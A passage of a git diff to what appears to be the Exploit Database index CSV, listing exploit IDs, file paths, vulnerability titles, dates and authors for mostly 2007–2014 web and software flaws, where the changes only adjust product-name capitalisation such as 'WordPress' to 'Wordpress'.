Plugins - Remote File Upload",2013-12-06,"Ashiyane Digital Security Team",php,webapps,0 +30084,platforms/php/webapps/30084.php,"Wordpress page-flip-image-gallery Plugins - Remote File Upload",2013-12-06,"Ashiyane Digital Security Team",php,webapps,0 30086,platforms/php/webapps/30086.txt,"BoastMachine 3.1 - 'index.php' Cross-Site Scripting",2007-05-25,newbinaryfile,php,webapps,0 30087,platforms/php/webapps/30087.txt,"Digirez 3.4 - Multiple Cross-Site Scripting Vulnerabilities",2007-05-25,Linux_Drox,php,webapps,0 30088,platforms/php/webapps/30088.txt,"Pligg 9.5 - Reset Forgotten Password Security Bypass",2007-05-25,"242th section",php,webapps,0 30089,platforms/linux/remote/30089.txt,"Ruby on Rails 1.2.3 To_JSON - Script Injection",2007-05-25,BCC,linux,remote,0 30091,platforms/linux/dos/30091.py,"OpenOffice 2.2 Writer Component - Remote Denial of Service",2007-05-28,shinnai,linux,dos,0 30095,platforms/php/webapps/30095.txt,"DGNews 1.5.1/2.1 - News.php SQL Injection",2007-05-28,"Jesper Jurcenoks",php,webapps,0 -30096,platforms/osx/local/30096.txt,"Apple Mac OS X 10.4.9 - VPND Local Format String",2007-05-29,"Chris Anley",osx,local,0 +30096,platforms/osx/local/30096.txt,"Apple Mac OSX 10.4.9 - VPND Local Format String",2007-05-29,"Chris Anley",osx,local,0 30097,platforms/php/webapps/30097.txt,"UebiMiau 2.7.10 - demo/pop3/error.php selected_theme Parameter Cross-Site Scripting",2007-05-29,"Michal Majchrowicz",php,webapps,0 30098,platforms/php/webapps/30098.txt,"UebiMiau 2.7.10 - 'demo/pop3/error.php' Multiple Variable Full Path Disclosure",2007-05-29,"Michal Majchrowicz",php,webapps,0 30099,platforms/php/webapps/30099.txt,"DGNews 2.1 - NewsID Parameter SQL Injection",2007-05-28,"laurent gaffie",php,webapps,0 @@ -27146,7 +27146,7 @@ id,file,description,date,author,platform,type,port 30215,platforms/ios/webapps/30215.txt,"Photo Video Album Transfer 1.0 iOS - Multiple Vulnerabilities",2013-12-11,Vulnerability-Lab,ios,webapps,0 30283,platforms/php/webapps/30283.txt,"SquirrelMail G/PGP Encryption Plugin 2.0/2.1 - Multiple Unspecified Remote Command Execution Vulnerabilities",2007-07-09,"Stefan Esser",php,webapps,0 30216,platforms/cfm/webapps/30216.txt,"FuseTalk 4.0 - AuthError.cfm Multiple Cross-Site Scripting Vulnerabilities",2007-06-20,"Ivan Almuina",cfm,webapps,0 -30217,platforms/php/webapps/30217.txt,"Wrapper.php for OsCommerce - Local File Inclusion",2007-06-20,"Joe Bloomquist",php,webapps,0 +30217,platforms/php/webapps/30217.txt,"Wrapper.php for osCommerce - Local File Inclusion",2007-06-20,"Joe Bloomquist",php,webapps,0 30218,platforms/multiple/remote/30218.txt,"BugHunter HTTP Server 1.6.2 - Parse Error Information Disclosure",2007-06-20,Prili,multiple,remote,0 30219,platforms/multiple/remote/30219.txt,"MyServer 0.8.9 - Filename Parse Error Information Disclosure",2007-06-21,"Shay Priel",multiple,remote,0 30220,platforms/php/webapps/30220.txt,"PHPAccounts 0.5 - 'index.php' Local File Inclusion",2007-06-21,r0t,php,webapps,0 @@ -27252,7 +27252,7 @@ id,file,description,date,author,platform,type,port 30322,platforms/windows/remote/30322.rb,"Lighttpd 1.4.15 - Multiple Code Execution / Denial of Service / Information Disclosure Vulnerabilities",2007-04-16,"Abhisek Datta",windows,remote,0 30323,platforms/php/webapps/30323.txt,"UseBB 1.0.7 - install/upgrade-0-2-3.php PHP_SELF Parameter Cross-Site Scripting",2007-07-20,s4mi,php,webapps,0 30324,platforms/php/webapps/30324.txt,"UseBB 1.0.7 - install/upgrade-0-3.php PHP_SELF Parameter Cross-Site Scripting",2007-07-20,s4mi,php,webapps,0 -30978,platforms/php/webapps/30978.txt,"WordPress 2.2.3 - wp-admin/page-new.php popuptitle Parameter Cross-Site Scripting",2008-01-03,3APA3A,php,webapps,0 +30978,platforms/php/webapps/30978.txt,"Wordpress 2.2.3 - wp-admin/page-new.php popuptitle Parameter Cross-Site Scripting",2008-01-03,3APA3A,php,webapps,0 30327,platforms/asp/webapps/30327.html,"Dora Emlak 1.0 Script - Multiple Input Validation Vulnerabilities",2007-07-23,GeFORC3,asp,webapps,0 30328,platforms/asp/webapps/30328.txt,"Alisveris Sitesi Scripti - Index.asp SQL Injection",2007-07-23,GeFORC3,asp,webapps,0 30329,platforms/php/webapps/30329.sh,"Gitlab 6.0 - Persistent Cross-Site Scripting",2013-12-16,hellok,php,webapps,0 @@ -27293,7 +27293,7 @@ id,file,description,date,author,platform,type,port 30400,platforms/aix/local/30400.c,"IBM AIX 5.2/5.3 FTP Client - Local Buffer Overflow",2007-07-26,qaaz,aix,local,0 30401,platforms/php/dos/30401.php,"T1lib - intT1_Env_GetCompletePath Buffer Overflow",2007-07-26,r0ut3r,php,dos,0 30402,platforms/asp/webapps/30402.txt,"Nukedit 4.9.x - Login.asp Cross-Site Scripting",2007-07-26,d3hydr8,asp,webapps,0 -30403,platforms/php/webapps/30403.txt,"WordPress WP-FeedStats 2.1 Plugin - HTML Injection",2007-07-26,"David Kierznowski",php,webapps,0 +30403,platforms/php/webapps/30403.txt,"Wordpress WP-FeedStats 2.1 Plugin - HTML Injection",2007-07-26,"David Kierznowski",php,webapps,0 30404,platforms/windows/remote/30404.html,"Yahoo! Widgets Engine 4.0.3 - YDPCTL.dll ActiveX Control Buffer Overflow",2007-07-27,Unknown,windows,remote,0 30405,platforms/php/webapps/30405.txt,"Bandersnatch 0.4 - Multiple Input Validation Vulnerabilities",2007-07-27,"Tim Brown",php,webapps,0 30413,platforms/windows/dos/30413.py,"PotPlayer 1.5.40688 - (.avi) File Handling Memory Corruption",2013-12-20,ariarat,windows,dos,0 @@ -27331,7 +27331,7 @@ id,file,description,date,author,platform,type,port 30440,platforms/cgi/webapps/30440.txt,"WebEvent 4.03 - Webevent.cgi Cross-Site Scripting",2007-07-31,d3hydr8,cgi,webapps,0 30441,platforms/windows/remote/30441.html,"BlueSkyChat ActiveX Control 8.1.2 - Buffer Overflow",2007-07-31,"Code Audit Labs",windows,remote,0 30442,platforms/php/webapps/30442.txt,"WebDirector - 'index.php' Cross-Site Scripting",2007-08-01,r0t,php,webapps,0 -30443,platforms/php/webapps/30443.txt,"WordPress Persuasion Theme 2.x - Arbitrary File Download / File Deletion Exploit",2013-12-23,"Interference Security",php,webapps,80 +30443,platforms/php/webapps/30443.txt,"Wordpress Persuasion Theme 2.x - Arbitrary File Download / File Deletion Exploit",2013-12-23,"Interference Security",php,webapps,80 30444,platforms/linux/dos/30444.txt,"KDE Konqueror 3.5.7 - Assert Denial of Service",2007-03-05,"Thomas Waldegger",linux,dos,0 30445,platforms/php/webapps/30445.txt,"Joomla Tour de France Pool 1.0.1 Module - mosConfig_absolute_path Remote File Inclusion",2007-08-02,Yollubunlar.Org,php,webapps,0 30446,platforms/asp/webapps/30446.txt,"Hunkaray Okul Portali 1.1 - Duyuruoku.asp SQL Injection",2007-08-02,Yollubunlar.Org,asp,webapps,0 @@ -27373,7 +27373,7 @@ id,file,description,date,author,platform,type,port 30482,platforms/php/webapps/30482.txt,"Web News 1.1 - feed.php config[root_ordner] Parameter Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0 30483,platforms/php/webapps/30483.txt,"Web News 1.1 - news.php config[root_ordner] Parameter Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0 30484,platforms/bsd/local/30484.c,"Systrace - Multiple System Call Wrappers Concurrency Vulnerabilities",2007-08-09,"Robert N. M. Watson",bsd,local,0 -30485,platforms/hardware/remote/30485.html,"ZyXEL ZyWALL 2 3.62 - Forms/General_1 sysSystemName Parameter Cross-Site Scripting",2007-08-10,"Henri Lindberg",hardware,remote,0 +30485,platforms/hardware/remote/30485.html,"ZYXEL ZyWALL 2 3.62 - Forms/General_1 sysSystemName Parameter Cross-Site Scripting",2007-08-10,"Henri Lindberg",hardware,remote,0 30486,platforms/php/webapps/30486.txt,"Lib2 PHP Library 0.2 - My_Statistics.php Remote File Inclusion",2007-08-11,"ilker Kandemir",php,webapps,0 30487,platforms/php/webapps/30487.txt,"Php-Stats 0.1.9.2 - WhoIs.php Cross-Site Scripting",2007-08-11,vasodipandora,php,webapps,0 30488,platforms/php/webapps/30488.php,"Haudenschilt Family Connections 0.8 - 'index.php' Authentication Bypass",2007-08-11,"ilker Kandemir",php,webapps,0 @@ -27408,7 +27408,7 @@ id,file,description,date,author,platform,type,port 30517,platforms/hardware/dos/30517.pl,"Grandstream GXV-3000 Phone - Remote Denial of Service",2007-08-22,MADYNES,hardware,dos,0 30518,platforms/php/webapps/30518.txt,"Ripe Website Manager 0.8.x - pages/delete_page.php id Parameter SQL Injection",2007-08-22,"Nagendra Kumar G",php,webapps,0 30519,platforms/multiple/dos/30519.txt,"Asura Engine Challenge B Query - Remote Stack Buffer Overflow",2007-08-22,"Luigi Auriemma",multiple,dos,0 -30520,platforms/php/webapps/30520.txt,"WordPress 1.0.7 - Pool Index.php Cross-Site Scripting",2007-08-13,MustLive,php,webapps,0 +30520,platforms/php/webapps/30520.txt,"Wordpress 1.0.7 - Pool Index.php Cross-Site Scripting",2007-08-13,MustLive,php,webapps,0 30521,platforms/multiple/remote/30521.txt,"Unreal Commander 0.92 - ZIP / RAR Archive Handling Traversal Arbitrary File Overwrite",2007-08-23,"Gynvael Coldwind",multiple,remote,0 30546,platforms/windows/local/30546.txt,"Multiple MicroWorld eScan Products - Privilege Escalation",2007-08-30,"Edi Strosar",windows,local,0 30523,platforms/multiple/remote/30523.txt,"Skulltag Huffman 0.97d-beta4.1 - Packet Decompression Remote Heap Based Buffer Overflow",2007-08-23,"Luigi Auriemma",multiple,remote,0 @@ -27440,7 +27440,7 @@ id,file,description,date,author,platform,type,port 30971,platforms/linux/remote/30971.txt,"Georgia SoftWorks Secure Shell Server 7.1.3 - Multiple Remote Code Execution Vulnerabilities",2007-01-02,"Luigi Auriemma",linux,remote,0 30972,platforms/multiple/remote/30972.txt,"Camtasia Studio 4.0.2 - 'csPreloader' Remote Code Execution",2008-01-02,"Rich Cannings",multiple,remote,0 30550,platforms/windows/dos/30550.php,"Ofilter Player 1.1 - (.wav) Integer Division by Zero",2013-12-28,"Osanda Malith",windows,dos,0 -31030,platforms/php/webapps/31030.pl,"SpamBam WordPress Plugin - Key Calculation Security Bypass",2007-01-15,Romero,php,webapps,0 +31030,platforms/php/webapps/31030.pl,"SpamBam Wordpress Plugin - Key Calculation Security Bypass",2007-01-15,Romero,php,webapps,0 30872,platforms/php/webapps/30872.txt,"DomPHP 0.83 - SQL Injection",2014-01-13,Houssamix,php,webapps,0 30973,platforms/multiple/remote/30973.txt,"InfoSoft FusionCharts 3 - .SWF Flash File Remote Code Execution",2008-01-02,"Rich Cannings",multiple,remote,0 30553,platforms/php/webapps/30553.txt,"Toms Gästebuch 1.00 - form.php Multiple Parameter Cross-Site Scripting",2007-09-07,cod3in,php,webapps,0 @@ -27450,7 +27450,7 @@ id,file,description,date,author,platform,type,port 30557,platforms/php/webapps/30557.txt,"Claroline 1.x - admin/adminusers.php dir Parameter Cross-Site Scripting",2007-09-03,"Fernando Munoz",php,webapps,0 30558,platforms/php/webapps/30558.txt,"Claroline 1.x - admin/advancedUserSearch.php action Parameter Cross-Site Scripting",2007-09-03,"Fernando Munoz",php,webapps,0 30559,platforms/php/webapps/30559.txt,"Claroline 1.x - admin/campusProblem.php view Parameter Cross-Site Scripting",2007-09-03,"Fernando Munoz",php,webapps,0 -30560,platforms/php/webapps/30560.txt,"212cafe Webboard 6.30 - Read.php SQL Injection",2007-09-04,"Lopez Bran Digrap",php,webapps,0 +30560,platforms/php/webapps/30560.txt,"212Cafe WebBoard 6.30 - Read.php SQL Injection",2007-09-04,"Lopez Bran Digrap",php,webapps,0 31024,platforms/hardware/remote/31024.txt,"F5 BIG-IP 9.4.3 - 'SearchString' Multiple Cross-Site Scripting Vulnerabilities",2008-01-14,nnposter,hardware,remote,0 31025,platforms/cgi/webapps/31025.txt,"Garment Center - 'index.cgi' Local File Inclusion",2008-01-14,Smasher,cgi,webapps,0 30877,platforms/php/webapps/30877.txt,"Roundcube Webmail 0.1 - CSS Expression Input Validation",2007-11-10,"Tomas Kuliavas",php,webapps,0 @@ -27520,9 +27520,9 @@ id,file,description,date,author,platform,type,port 30582,platforms/windows/remote/30582.html,"WinSCP 4.0.3 - URL Protocol Handler Arbitrary File Access",2007-09-13,Kender.Security,windows,remote,0 30583,platforms/php/webapps/30583.txt,"Php-Stats 0.1.9.2 - Tracking.php Cross-Site Scripting",2007-09-14,root@hanicker.it,php,webapps,0 30584,platforms/linux/dos/30584.py,"Boa 0.93.15 - Administrator Password Overwrite Authentication Bypass",2007-09-14,"Luca Carettoni",linux,dos,0 -30585,platforms/cgi/webapps/30585.txt,"Axis Communications 207W Network Camera Web Interface - axis-cgi/admin/restart.cgi Cross-Site Request Forgery",2007-09-14,"Seth Fogie",cgi,webapps,0 -30586,platforms/cgi/webapps/30586.txt,"Axis Communications 207W Network Camera Web Interface - axis-cgi/admin/pwdgrp.cgi Multiple Parameter Cross-Site Request Forgery",2007-09-14,"Seth Fogie",cgi,webapps,0 -30587,platforms/cgi/webapps/30587.txt,"Axis Communications 207W Network Camera Web Interface - admin/restartMessage.shtml server Parameter Cross-Site Request Forgery",2007-09-14,"Seth Fogie",cgi,webapps,0 +30585,platforms/cgi/webapps/30585.txt,"Axis Communications 207W Network Camera - Web Interface axis-cgi/admin/restart.cgi Cross-Site Request Forgery",2007-09-14,"Seth Fogie",cgi,webapps,0 +30586,platforms/cgi/webapps/30586.txt,"Axis Communications 207W Network Camera - Web Interface axis-cgi/admin/pwdgrp.cgi Multiple Parameter Cross-Site Request Forgery",2007-09-14,"Seth Fogie",cgi,webapps,0 +30587,platforms/cgi/webapps/30587.txt,"Axis Communications 207W Network Camera - Web Interface admin/restartMessage.shtml server Parameter Cross-Site Request Forgery",2007-09-14,"Seth Fogie",cgi,webapps,0 30588,platforms/php/webapps/30588.txt,"ewire Payment Client 1.60/1.70 - Command Execution",2007-09-17,anonymous,php,webapps,0 30589,platforms/windows/remote/30589.txt,"WinImage 8.0/8.10 - File Handling Traversal Arbitrary File Overwrite",2007-09-17,j00ru//vx,windows,remote,0 30590,platforms/windows/dos/30590.txt,"WinImage 8.0/8.10 - Malformed .IMG File BPB_BytsPerSec Field Denial of Service",2007-09-17,j00ru//vx,windows,dos,0 @@ -27537,7 +27537,7 @@ id,file,description,date,author,platform,type,port 30599,platforms/cgi/webapps/30599.txt,"WebBatch - webbatch.exe dumpinputdata Variable Remote Information Disclosure",2007-09-20,Doz,cgi,webapps,0 30600,platforms/windows/remote/30600.html,"Xunlei Web Thunder 5.6.9.344 - ActiveX Control DownURL2 Method Remote Buffer Overflow",2007-09-20,7jdg,windows,remote,0 30601,platforms/php/webapps/30601.txt,"Vigile CMS 1.8 Wiki Module - Multiple Cross-Site Scripting Vulnerabilities",2007-09-20,x0kster,php,webapps,0 -30602,platforms/php/webapps/30602.html,"WordPress 2.0 - wp-register.php Multiple Cross-Site Scripting Vulnerabilities",2007-09-22,"Adrian Pastor",php,webapps,0 +30602,platforms/php/webapps/30602.html,"Wordpress 2.0 - wp-register.php Multiple Cross-Site Scripting Vulnerabilities",2007-09-22,"Adrian Pastor",php,webapps,0 30603,platforms/php/webapps/30603.html,"Xcms 1.1/1.7 - Password Parameter Arbitrary PHP Code Execution",2007-09-22,x0kster,php,webapps,0 30604,platforms/linux/local/30604.c,"Linux Kernel 2.6.x - Ptrace Privilege Escalation",2007-09-21,"Wojciech Purczynski",linux,local,0 30605,platforms/linux/local/30605.c,"Linux Kernel 2.6.x - ALSA snd-page-alloc Local Proc File Information Disclosure",2007-09-21,Karimo_DM,linux,local,0 @@ -27633,7 +27633,7 @@ id,file,description,date,author,platform,type,port 30689,platforms/php/webapps/30689.php,"Taboada Macronews 1.0 - SQL Injection Exploit",2014-01-04,Jefrey,php,webapps,0 31027,platforms/php/webapps/31027.txt,"pMachine Pro 2.4.1 - Multiple Cross-Site Scripting Vulnerabilities",2008-01-14,fuzion,php,webapps,0 31028,platforms/php/webapps/31028.txt,"Article Dashboard - 'admin/login.php' Multiple SQL Injection",2008-01-15,Xcross87,php,webapps,0 -31029,platforms/php/webapps/31029.pl,"Peter's Math Anti-Spam for WordPress 0.1.6 Plugin - Audio CAPTCHA Security Bypass",2008-01-15,Romero,php,webapps,0 +31029,platforms/php/webapps/31029.pl,"Peter's Math Anti-Spam for Wordpress 0.1.6 Plugin - Audio CAPTCHA Security Bypass",2008-01-15,Romero,php,webapps,0 30691,platforms/php/webapps/30691.txt,"Alacate-Lucent OmniVista 4760 - Multiple Cross-Site Scripting Vulnerabilities",2007-10-18,"Miguel Angel",php,webapps,0 30692,platforms/windows/remote/30692.js,"RealPlayer 10.0/10.5/11 - ierpplug.dll ActiveX Control Import Playlist Name Stack Buffer Overflow",2007-10-18,anonymous,windows,remote,0 30693,platforms/php/webapps/30693.txt,"SocketKB 1.1.5 - Multiple Cross-Site Scripting Vulnerabilities",2007-10-19,"Ivan Sanchez",php,webapps,0 @@ -27656,7 +27656,7 @@ id,file,description,date,author,platform,type,port 30712,platforms/php/webapps/30712.txt,"Multi-Forums - Directory.php Multiple SQL Injection",2007-10-25,KiNgOfThEwOrLd,php,webapps,0 30713,platforms/multiple/dos/30713.html,"Mozilla FireFox 2.0.8 - Sidebar Bookmark Persistent Denial Of Service",2007-10-26,"The Hacker Webzine",multiple,dos,0 30714,platforms/unix/dos/30714.pl,"IBM Lotus Domino 7.0.2 - IMAP4 LSUB Buffer Overflow",2007-10-27,"Manuel Santamarina Suarez",unix,dos,0 -30715,platforms/php/webapps/30715.txt,"WordPress 2.3 - Edit-Post-Rows.php Cross-Site Scripting",2007-10-29,waraxe,php,webapps,0 +30715,platforms/php/webapps/30715.txt,"Wordpress 2.3 - Edit-Post-Rows.php Cross-Site Scripting",2007-10-29,waraxe,php,webapps,0 30716,platforms/php/webapps/30716.txt,"Smart-Shop - 'index.php' Multiple Parameter Cross-Site Scripting",2007-10-29,Doz,php,webapps,0 30717,platforms/php/webapps/30717.txt,"Omnistar Live - KB.php Cross-Site Scripting",2007-10-29,Doz,php,webapps,0 30718,platforms/php/webapps/30718.txt,"Saxon 5.4 - Menu.php Cross-Site Scripting",2007-10-29,netVigilance,php,webapps,0 @@ -27704,10 +27704,10 @@ id,file,description,date,author,platform,type,port 30759,platforms/cgi/webapps/30759.txt,"VTLS Web Gateway 48.1 - Searchtype Parameter Cross-Site Scripting",2007-11-13,"Jesus Olmos Gonzalez",cgi,webapps,0 30760,platforms/php/dos/30760.txt,"PHP 5.2.5 - Multiple GetText Functions Denial Of Service Vulnerabilities",2007-11-13,"laurent gaffie",php,dos,0 30761,platforms/windows/dos/30761.html,"WebEx GPCContainer - Memory Access Violation Multiple Denial of Service Vulnerabilities",2007-11-13,"Elazar Broad",windows,dos,0 -30762,platforms/php/webapps/30762.txt,"WP-SlimStat 0.9.2 WordPress Plugin - Cross-Site Scripting",2007-11-13,"Fracesco Vaj",php,webapps,0 +30762,platforms/php/webapps/30762.txt,"WP-SlimStat 0.9.2 Wordpress Plugin - Cross-Site Scripting",2007-11-13,"Fracesco Vaj",php,webapps,0 30763,platforms/linux/dos/30763.php,"KDE Konqueror 3.5.6 - Cookie Handling Denial of Service",2007-11-14,"laurent gaffie",linux,dos,0 30764,platforms/php/webapps/30764.txt,"CONTENTCustomizer 3.1 - Dialog.php Unauthorized Access",2007-11-14,d3hydr8,php,webapps,0 -30765,platforms/osx/local/30765.c,"Apple Mac OS X 10.4.11 2007-008 - i386_set_ldt System Call Local Arbitrary Code Execution",2007-11-14,"Mark Tull",osx,local,0 +30765,platforms/osx/local/30765.c,"Apple Mac OSX 10.4.11 2007-008 - i386_set_ldt System Call Local Arbitrary Code Execution",2007-11-14,"Mark Tull",osx,local,0 30766,platforms/linux/dos/30766.c,"GNU TAR 1.15.91 / CPIO 2.5.90 - safer_name_suffix Remote Denial of Service",2007-11-14,"Dmitry V. Levin",linux,dos,0 30767,platforms/windows/dos/30767.html,"Apple Safari 3.0.x - for Windows Document.Location.Hash Buffer Overflow",2007-06-25,"Azizov E",windows,dos,0 30768,platforms/multiple/remote/30768.txt,"IBM WebSphere Application Server 5.1.1 - WebContainer HTTP Request Header Security",2007-11-15,anonymous,multiple,remote,0 @@ -27723,12 +27723,12 @@ id,file,description,date,author,platform,type,port 30778,platforms/asp/webapps/30778.txt,"Click&BaneX - Details.asp SQL Injection",2007-11-19,"Aria-Security Team",asp,webapps,0 30779,platforms/multiple/dos/30779.txt,"Rigs of Rods 0.33d - Long Vehicle Name Buffer Overflow",2007-11-19,"Luigi Auriemma",multiple,dos,0 30780,platforms/linux/local/30780.txt,"ISPmanager 4.2.15 - Responder Privilege Escalation",2007-11-20,"Andrew Christensen",linux,local,0 -30781,platforms/osx/remote/30781.txt,"Apple Mac OS X 10.5.x - Mail Arbitrary Code Execution",2007-11-20,"heise Security",osx,remote,0 +30781,platforms/osx/remote/30781.txt,"Apple Mac OSX 10.5.x - Mail Arbitrary Code Execution",2007-11-20,"heise Security",osx,remote,0 31026,platforms/hardware/remote/31026.pl,"Fortinet Fortigate - CRLF Characters URL Filtering Bypass",2008-01-14,Danux,hardware,remote,0 30974,platforms/multiple/dos/30974.txt,"Asterisk 1.x - BYE Message Remote Denial of Service",2008-01-02,greyvoip,multiple,dos,0 30975,platforms/cgi/webapps/30975.txt,"W3-mSQL - Error Page Cross-Site Scripting",2008-01-03,vivek_infosec,cgi,webapps,0 30976,platforms/php/webapps/30976.txt,"MyPHP Forum 3.0 - 'Search.php' Multiple Unspecified SQL Injection",2008-01-03,The:Paradox,php,webapps,0 -30977,platforms/php/webapps/30977.txt,"WordPress 2.2.3 - wp-admin/post.php popuptitle Parameter Cross-Site Scripting",2008-01-03,3APA3A,php,webapps,0 +30977,platforms/php/webapps/30977.txt,"Wordpress 2.2.3 - wp-admin/post.php popuptitle Parameter Cross-Site Scripting",2008-01-03,3APA3A,php,webapps,0 30786,platforms/php/webapps/30786.txt,"Middle School Homework Page 1.3 Beta 1 - Multiple Vulnerabilities",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,80 30787,platforms/php/remote/30787.rb,"vTiger CRM SOAP AddEmailAttachment - Arbitrary File Upload",2014-01-07,Metasploit,php,remote,80 30788,platforms/windows/local/30788.rb,"IcoFX - Stack Buffer Overflow",2014-01-07,Metasploit,windows,local,0 @@ -27793,7 +27793,7 @@ id,file,description,date,author,platform,type,port 30886,platforms/php/webapps/30886.txt,"MKPortal 1.1 Gallery Module - SQL Injection",2007-12-13,"Sw33t h4cK3r",php,webapps,0 30887,platforms/php/webapps/30887.txt,"phPay 2.2.1 - Windows Installations Local File Inclusion",2007-12-15,"Michael Brooks",php,webapps,0 30888,platforms/php/webapps/30888.txt,"phpRPG 0.8 - /tmp Directory PHPSESSID Cookie Session Hijacking",2007-12-15,"Michael Brooks",php,webapps,0 -30889,platforms/php/webapps/30889.txt,"WordPress 2.3.1 - Unauthorized Post Access",2007-12-15,"Michael Brooks",php,webapps,0 +30889,platforms/php/webapps/30889.txt,"Wordpress 2.3.1 - Unauthorized Post Access",2007-12-15,"Michael Brooks",php,webapps,0 30890,platforms/php/webapps/30890.txt,"Black Sheep Web Software Form Tools 1.5 - Multiple Remote File Inclusion",2007-12-14,RoMaNcYxHaCkEr,php,webapps,0 30891,platforms/php/webapps/30891.txt,"Flyspray 0.9.9 - Multiple Cross-Site Scripting Vulnerabilities",2007-12-09,"KAWASHIMA Takahiro",php,webapps,0 30892,platforms/php/webapps/30892.txt,"Neuron News 1.0 - Multiple SQL Injections / Cross-Site Scripting Vulnerabilities",2007-12-17,"hadihadi & black.shadowes",php,webapps,0 @@ -27838,7 +27838,7 @@ id,file,description,date,author,platform,type,port 30932,platforms/php/webapps/30932.txt,"Logaholic - profiles.php newconfname Parameter Cross-Site Scripting",2007-12-24,malibu.r,php,webapps,0 30933,platforms/multiple/remote/30933.php,"Zoom Player 3.30/5/6 - Crafted .ZPL File Error Message Arbitrary Code Execution",2007-12-24,"Luigi Auriemma",multiple,remote,0 30934,platforms/windows/dos/30934.txt,"Total Player 3.0 - .M3U File Denial of Service",2007-12-25,"David G.M.",windows,dos,0 -30935,platforms/hardware/remote/30935.txt,"ZyXEL P-330W - Multiple Vulnerabilities",2007-12-25,santa_clause,hardware,remote,0 +30935,platforms/hardware/remote/30935.txt,"ZYXEL P-330W - Multiple Vulnerabilities",2007-12-25,santa_clause,hardware,remote,0 30936,platforms/windows/dos/30936.html,"AOL Picture Editor 'YGPPicEdit.dll' ActiveX Control 9.5.1.8 - Multiple Buffer Overflow Vulnerabilities",2007-12-25,"Elazar Broad",windows,dos,0 30937,platforms/php/webapps/30937.txt,"Limbo CMS 1.0.4 - 'com_option' Parameter Cross-Site Scripting",2007-12-25,"Omer Singer",php,webapps,0 30938,platforms/asp/webapps/30938.txt,"Web Sihirbazi 5.1.1 - 'default.asp' Multiple SQL Injection",2007-12-24,bypass,asp,webapps,0 @@ -27870,7 +27870,7 @@ id,file,description,date,author,platform,type,port 30965,platforms/php/webapps/30965.txt,"LiveCart 1.0.1 - category q Parameter Cross-Site Scripting",2007-12-31,Doz,php,webapps,0 30966,platforms/php/webapps/30966.txt,"LiveCart 1.0.1 - order return Parameter Cross-Site Scripting",2007-12-31,Doz,php,webapps,0 30967,platforms/php/webapps/30967.txt,"LiveCart 1.0.1 - user/remindComplete email Parameter Cross-Site Scripting",2007-12-31,Doz,php,webapps,0 -30979,platforms/php/webapps/30979.txt,"WordPress 2.2.3 - wp-admin/edit.php backup Parameter Cross-Site Scripting",2008-01-03,3APA3A,php,webapps,0 +30979,platforms/php/webapps/30979.txt,"Wordpress 2.2.3 - wp-admin/edit.php backup Parameter Cross-Site Scripting",2008-01-03,3APA3A,php,webapps,0 30980,platforms/php/webapps/30980.txt,"AwesomeTemplateEngine 1 - Multiple Cross-Site Scripting Vulnerabilities",2008-01-03,MustLive,php,webapps,0 30981,platforms/php/webapps/30981.txt,"PRO-Search 0.17 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2008-01-03,MustLive,php,webapps,0 30982,platforms/php/webapps/30982.html,"Nucleus CMS 3.0.1 - 'myid' Parameter SQL Injection",2008-01-03,MustLive,php,webapps,0 @@ -27971,16 +27971,16 @@ id,file,description,date,author,platform,type,port 31088,platforms/hardware/webapps/31088.py,"BLUE COM Router 5360/52018 - Password Reset Exploit",2014-01-20,KAI,hardware,webapps,80 31090,platforms/windows/local/31090.txt,"MuPDF 1.3 - Stack-based Buffer Overflow in xps_parse_color()",2014-01-20,"Jean-Jamil Khalife",windows,local,0 31091,platforms/php/webapps/31091.txt,"Domain Trader 2.0 - 'catalog.php' Cross-Site Scripting",2008-02-02,Crackers_Child,php,webapps,0 -31092,platforms/php/webapps/31092.txt,"WP-Footnotes 2.2 WordPress Plugin - Multiple Remote Vulnerabilities",2008-02-02,NBBN,php,webapps,0 +31092,platforms/php/webapps/31092.txt,"WP-Footnotes 2.2 Wordpress Plugin - Multiple Remote Vulnerabilities",2008-02-02,NBBN,php,webapps,0 31093,platforms/php/webapps/31093.txt,"ITechClassifieds - ViewCat.php CatID Parameter SQL Injection",2008-02-02,Crackers_Child,php,webapps,0 31094,platforms/php/webapps/31094.txt,"ITechClassifieds - ViewCat.php CatID Parameter Cross-Site Scripting",2008-02-02,Crackers_Child,php,webapps,0 31095,platforms/novell/remote/31095.txt,"Novell GroupWise 5.57e/6.5.7/7.0 WebAccess - Multiple Cross-Site Scripting Vulnerabilities",2008-01-31,"Frederic Loudet",novell,remote,0 -31096,platforms/php/webapps/31096.txt,"WordPress Plugin ShiftThis Newsletter - SQL Injection",2008-02-03,S@BUN,php,webapps,0 +31096,platforms/php/webapps/31096.txt,"Wordpress Plugin ShiftThis Newsletter - SQL Injection",2008-02-03,S@BUN,php,webapps,0 31097,platforms/php/webapps/31097.txt,"CruxCMS 3.0 - 'search.php' Cross-Site Scripting",2008-02-04,Psiczn,php,webapps,0 31098,platforms/php/webapps/31098.txt,"Simple OS CMS 0.1c_beta - 'login.php' SQL Injection",2008-02-04,Psiczn,php,webapps,0 31099,platforms/php/webapps/31099.txt,"Codice CMS - 'login.php' SQL Injection",2008-02-04,Psiczn,php,webapps,0 31100,platforms/multiple/dos/31100.txt,"Anon Proxy Server 0.100/0.102 - Remote Authentication Buffer Overflow",2008-02-04,L4teral,multiple,dos,0 -31101,platforms/php/webapps/31101.txt,"HispaH Youtube Clone - 'load_message.php' Cross-Site Scripting",2008-02-04,Smasher,php,webapps,0 +31101,platforms/php/webapps/31101.txt,"HispaH YouTube Clone - 'load_message.php' Cross-Site Scripting",2008-02-04,Smasher,php,webapps,0 31102,platforms/hardware/dos/31102.c,"MikroTik RouterOS 3.0 - SNMP SET Denial of Service",2008-02-04,ShadOS,hardware,dos,0 31103,platforms/asp/webapps/31103.txt,"AstroSoft HelpDesk - operator/article/article_search_results.asp txtSearch Parameter Cross-Site Scripting",2008-02-04,"Alexandr Polyakov",asp,webapps,0 31104,platforms/asp/webapps/31104.txt,"AstroSoft HelpDesk - operator/article/article_attachment.asp Attach_Id Parameter Cross-Site Scripting",2008-02-04,"Alexandr Polyakov",asp,webapps,0 @@ -28120,13 +28120,13 @@ id,file,description,date,author,platform,type,port 31225,platforms/php/webapps/31225.html,"RunCMS 1.6.1 - 'admin.php' Cross-Site Scripting",2008-02-18,NBBN,php,webapps,0 31226,platforms/php/webapps/31226.txt,"Joomla! and Mambo com_detail Component - 'id' Parameter SQL Injection",2008-02-18,S@BUN,php,webapps,0 